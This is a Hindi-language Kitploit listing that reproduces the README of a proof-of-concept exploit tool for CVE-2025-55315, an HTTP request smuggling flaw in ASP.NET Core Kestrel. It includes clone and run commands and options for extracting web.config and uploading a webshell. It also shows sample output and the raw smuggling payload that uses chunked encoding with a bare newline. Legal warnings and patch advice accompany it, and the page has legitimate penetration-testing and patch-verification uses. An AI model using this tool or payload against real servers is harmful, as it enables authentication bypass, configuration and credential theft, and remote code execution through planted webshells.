Skip to content
KitploitKITPLOIT
उपकरणएक्सप्लॉइटब्लॉग
Log in
जमा करें
उपकरणएक्सप्लॉइटब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55315-PoC-Exploit — CVE-2025-55315 PoC शोषण | Kitploit
उपकरण/GitHubGitHub/zemarkhos/cve-2025-55315-poc-exploit
भेद्यता स्कैनरपेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubzemarkhos/cve-2025-55315-poc-exploit

CVE-2025-55315-PoC-Exploit

CVE-2025-55315 PoC शोषण

रिपॉजिटरी देखें
85910 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55315 पेंटेस्ट टूल

ASP.NET Core Kestrel के लिए HTTP अनुरोध तस्करी शोषण उपकरण

Python Version CVE CVSS License


⚠️ कानूनी चेतावनी

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण के लिए है!

  • केवल उन सिस्टम पर उपयोग करें जिनके आप मालिक हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति है
  • कंप्यूटर सिस्टम तक अनधिकृत पहुंच गैरकानूनी है
  • टूल निर्माता दुरुपयोग के लिए जिम्मेदार नहीं है
  • इस उपकरण का उपयोग करके, आप पूर्ण कानूनी जिम्मेदारी स्वीकार करते हैं

📋 अवलोकन

CVE-2025-55315 (ASP.NET Core Kestrel HTTP अनुरोध तस्करी भेद्यता) के लिए व्यावसायिक पैठ परीक्षण उपकरण। यह उपकरण व्यापक शोषण क्षमताओं के साथ एकल-लक्ष्य विश्लेषण के लिए डिज़ाइन किया गया है।

CVE-2025-55315 क्या है?

ASP.NET Core Kestrel वेब सर्वर में एक गंभीर HTTP अनुरोध तस्करी भेद्यता (CVSS 9.9/10) जो हमलावरों को अनुमति देती है:

  • प्रमाणीकरण को बायपास करना
  • क्रेडेंशियल और सत्र टोकन चुराना
  • सर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF) करना
  • कैश को जहर देना
  • वेबशेल अपलोड करना और दूरस्थ कोड निष्पादन प्राप्त करना

प्रभावित संस्करण:

  • .NET Core 3.0 से .NET 9.0.9 तक
  • .NET 8.0.21+, 9.0.10+, 10.0.0-rc2+ में सुधार किया गया

✨ विशेषताएँ

मुख्य क्षमताएँ

  • ✅ एकल लक्ष्य विश्लेषण - विशिष्ट लक्ष्य पर केंद्रित पैठ परीक्षण
  • ✅ स्वचालित एंडपॉइंट खोज - सामान्य ASP.NET Core एंडपॉइंट की खोज
  • ✅ मैनुअल एंडपॉइंट परीक्षण - रुचि के विशिष्ट एंडपॉइंट का परीक्षण
  • ✅ भेद्यता पहचान - सटीक CVE-2025-55315 पहचान
  • ✅ web.config निष्कर्षण - अनुरोध तस्करी के माध्यम से कॉन्फ़िगरेशन फ़ाइलें पढ़ना
  • ✅ वेबशेल अपलोड - वैकल्पिक वेबशेल तैनाती क्षमता
  • ✅ विस्तृत रिपोर्टिंग - JSON और टेक्स्ट प्रारूप में रिपोर्ट
  • ✅ सुरक्षा सुविधाएँ - विनाशकारी कार्यों के लिए कई पुष्टि संकेत

तकनीकी विशेषताएँ

  • HTTP/1.1 और HTTPS समर्थन
  • कस्टम पोर्ट समर्थन
  • कॉन्फ़िगरेबल टाइमआउट
  • वर्बोज़ डिबगिंग मोड
  • रंग-कोडित टर्मिनल आउटपुट
  • SSL प्रमाणपत्र सत्यापन बायपास (परीक्षण के लिए)

🔧 स्थापना

आवश्यकताएँ

# Python 3.7 या उच्चतर
python3 --version

# कोई बाहरी निर्भरता नहीं - केवल मानक लाइब्रेरी का उपयोग करता है

डाउनलोड

# टूल को क्लोन या डाउनलोड करें
git clone https://github.com/ZemarKhos/CVE-2025-55315-PoC-Exploit.git
cd CVE-2025-55315-PoC-Exploit

# निष्पादन योग्य बनाएं
chmod +x cve_2025_55315_PoC.py

🚀 त्वरित आरंभ

बुनियादी भेद्यता स्कैन

python3 cve_2025_55315_PoC.py -t target.com

यह करेगा:

  1. सर्वर जानकारी एकत्र करना
  2. स्वचालित रूप से सक्रिय एंडपॉइंट खोजना
  3. प्रत्येक एंडपॉइंट का CVE-2025-55315 के लिए परीक्षण
  4. टर्मिनल में परिणाम प्रदर्शित करना

विशिष्ट एंडपॉइंट का परीक्षण

python3 cve_2025_55315_PoC.py -t target.com -e /api/login

web.config निष्कर्षण के साथ पूर्ण स्कैन

python3 cve_2025_55315_PoC.py -t target.com --read-config -o report.txt

उन्नत: पूर्ण शोषण (केवल अधिकृत!)

python3 cve_2025_55315_PoC.py \
  -t target.com \
  --read-config \
  --upload-shell \
  -v \
  -o full_report.txt

📖 उपयोग उदाहरण

उदाहरण 1: त्वरित जाँच

परिदृश्य: जाँचें कि प्रोडक्शन सर्वर असुरक्षित है या नहीं

python3 cve_2025_55315_PoC.py -t api.mycompany.com

अपेक्षित अवधि: 30-60 सेकंड


उदाहरण 2: विस्तृत स्कैन

परिदृश्य: वर्बोज़ आउटपुट के साथ व्यापक एंडपॉइंट स्कैन

python3 cve_2025_55315_PoC.py -t api.mycompany.com -v -o scan_results.txt

अपेक्षित अवधि: 2-5 मिनट


उदाहरण 3: एकाधिक एंडपॉइंट को लक्षित करें

परिदृश्य: विशिष्ट महत्वपूर्ण एंडपॉइंट का परीक्षण

python3 cve_2025_55315_PoC.py \
  -t api.mycompany.com \
  -e /api/payment/process \
  -e /api/admin/users \
  -e /api/internal/config \
  -o critical_endpoints.txt

उदाहरण 4: गैर-SSL लक्ष्य

परिदृश्य: आंतरिक HTTP सर्वर का परीक्षण

python3 cve_2025_55315_PoC.py \
  -t internal-api.local \
  -p 8080 \
  --no-ssl

📊 कमांड-लाइन विकल्प

usage: cve_2025_55315_PoC.py [-h] -t TARGET [-p PORT] [-e ENDPOINT]
                                  [--no-ssl] [--read-config] [--upload-shell]
                                  [-o OUTPUT] [-v] [--timeout TIMEOUT]

अनिवार्य तर्क:
  -t, --target         लक्ष्य होस्टनाम या URL (जैसे, target.com)

वैकल्पिक तर्क:
  -p, --port           पोर्ट नंबर (डिफ़ॉल्ट: SSL के लिए 443, गैर-SSL के लिए 80)
  -e, --endpoint       परीक्षण करने के लिए विशिष्ट एंडपॉइंट (एकाधिक बार उपयोग किया जा सकता है)
  --no-ssl             SSL/HTTPS अक्षम करें (HTTP का उपयोग करें)
  --read-config        web.config फ़ाइल पढ़ने का प्रयास करें
  --upload-shell       वेबशेल अपलोड का प्रयास करें (पुष्टि आवश्यक)
  -o, --output         रिपोर्ट को फ़ाइल में सहेजें
  -v, --verbose        वर्बोज़ आउटपुट सक्षम करें
  --timeout            सेकंड में सॉकेट टाइमआउट (डिफ़ॉल्ट: 10)
  -h, --help           सहायता संदेश दिखाएँ

🔍 आउटपुट को समझना

असुरक्षित सिस्टम उदाहरण

Target: old-api.company.com:443
Vulnerable: YES - CRITICAL

--- Server Information ---
  server: Kestrel/8.0.15
  kestrel_detected: True
  http_version: 1.1

--- VULNERABLE ENDPOINTS (2) ---
  ✗ /api/login
    Details: Request smuggling successful - multiple responses
  ✗ /api/health
    Details: Request smuggling successful - multiple responses

--- SUCCESSFUL EXPLOITS ---
  ✓ web.config_read via /api/login

व्याख्या:

  • 🔴 गंभीर भेद्यता का पता चला
  • 🔴 एकाधिक एंडपॉइंट असुरक्षित हैं
  • 🔴 कॉन्फ़िगरेशन फ़ाइल सफलतापूर्वक निकाली गई
  • ⚡ तत्काल: .NET 8.0.21+ या 9.0.10+ पर अपडेट करें

सुरक्षित सिस्टम उदाहरण

Target: new-api.company.com:443
Vulnerable: NO - SECURE

--- Server Information ---
  server: Kestrel/9.0.10
  kestrel_detected: True
  http_version: 1.1

[SUCCESS] ✓ Endpoint NOT vulnerable (400 Bad Request)

✓ No vulnerable endpoints found - target may be patched

व्याख्या:

  • ✅ सिस्टम सुरक्षित है
  • ✅ पैच किए गए Kestrel संस्करण पर चल रहा है
  • ✅ सभी दुर्भावनापूर्ण अनुरोध अस्वीकार कर दिए गए

🛡️ सुरक्षा और नैतिकता

प्राधिकरण जाँच सूची

यह उपकरण चलाने से पहले, सुनिश्चित करें:

  • आप लक्ष्य सिस्टम के मालिक हैं, या
  • आपके पास परीक्षण के लिए लिखित प्राधिकरण है, और
  • सुरक्षा टीम को सूचित किया गया है, और
  • आपके पास रोलबैक योजना है, और
  • आप कानूनी निहितार्थों को समझते हैं

अंतर्निहित सुरक्षा सुविधाएँ

  1. दो-चरणीय पुष्टि - टूल शुरू करने से पहले प्राधिकरण माँगता है
  2. वेबशेल अपलोड पुष्टि - बड़े अक्षरों में "YES" टाइप करना आवश्यक है
  3. दर सीमित करना - स्वचालित खोज के दौरान अनुरोधों के बीच देरी
  4. टाइमआउट सुरक्षा - लटकते कनेक्शन को रोकता है
  5. विस्तृत लॉगिंग - ऑडिट ट्रेल के लिए सभी क्रियाएँ लॉग की जाती हैं

🔬 तकनीकी विवरण

शोषण तकनीक

यह उपकरण दुर्भावनापूर्ण चंकड ट्रांसफर एन्कोडिंग का उपयोग करके CVE-2025-55315 का शोषण करता है:

POST /endpoint HTTP/1.1
Host: target.com
Transfer-Encoding: chunked

2;\n          ← भेद्यता: \r\n के बजाय अकेला \n
XX
0\r\n
\r\n
GET /smuggled HTTP/1.1    ← यह एक अलग अनुरोध बन जाता है
Host: target.com

यह क्यों काम करता है:

  1. प्रॉक्सी सर्वर \n को लाइन टर्मिनेटर के रूप में देखता है → इसे एकल अनुरोध के रूप में संसाधित करता है
  2. Kestrel (असुरक्षित) \n को अनदेखा करता है → तस्करी किए गए GET को एक अलग अनुरोध के रूप में मानता है
  3. तस्करी किया गया अनुरोध किसी अन्य उपयोगकर्ता के सत्र संदर्भ में निष्पादित हो सकता है

पहचान तर्क

टूल डाउनलोड करें